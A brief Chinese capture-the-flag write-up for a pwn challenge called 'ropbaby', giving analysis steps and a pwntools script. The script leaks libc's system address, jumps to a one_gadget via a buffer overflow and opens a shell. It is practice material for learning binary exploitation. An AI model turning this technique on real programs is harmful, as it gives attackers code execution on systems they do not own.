1.实验吧

分析 1.先查看文件位数，安全机制 2.查看strings，调用函数（特别注意常见的函数）漏洞点 EXP from pwn import * context.log_level = "debug" p = process('./ropbaby') p.recvuntil(': ') p.sendline('2') p.recvuntil('Enter symbol: ') p.sendline('system') a=p.recvline() libc = a.split(': ')[-1] lib=int(libc,16) - 0x45390 log.success('libc : %#x',lib) onegadget =0x45216+lib p.recvuntil(': ') p.sendline('3') p.recvuntil('(max 1024): ') p.sendline('17') p.sendline('a'*8 + p64(onegadget)) p.recvuntil(': ') p.sendline('4') #让题目正常退出 p.interactive()